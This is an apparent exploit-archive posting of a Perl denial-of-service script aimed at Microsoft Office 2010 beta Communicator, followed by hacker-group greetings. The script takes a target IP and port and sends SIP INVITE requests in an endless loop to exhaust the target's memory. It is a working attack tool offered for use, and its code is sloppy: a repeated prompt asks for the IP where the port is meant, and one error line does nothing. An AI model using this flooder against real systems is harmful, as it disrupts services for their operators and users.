Microsoft Office 2010 Beta – Communicator SIP Denial of Service

========================================================================================

| # Title: Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit

| # Author : indoushka

| # email: indoushka@hotmail.com

| # Home : www.iqs3cur1ty.com/vb

| # Tested on: windows SP2

| # Bug: Denial of service Exploit

======================Exploit By indoushka =================================

# Exploit:

#!usr/bin/perl

#######################################################################################################################

#Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via#

#a large number of SIP INVITE requests. #

#######################################################################################################################

use IO::Socket;

print("\nEnter IP Address of Target Server: \n");

$vuln_host_ip = <STDIN>;

print("\nEnter IP Address of Target Server: \n");

$port = <STDIN>;

$sock_sip = IO::Socket::INET->new(PeerAddr => $vuln_host_ip,

PeerPort => $port,

Proto=> 'udp') || "Unable to create Socket";

#if the server is configured on TCP replace 'udp' with 'tcp'.

while(1)

{

print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";

}

#program never comes here for execution

close($sock_sip);

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================

Greetz :

Exploit-db Team :

(loneferret+Exploits+dookie2000ca)

all my friend :

His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)

Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R (http://www.ilegalintrusion.net/foro/)

Cyb3r IntRue (avengers team) * The globin * Virus_Hima

---------------------------------------------------------------------------------------------------------------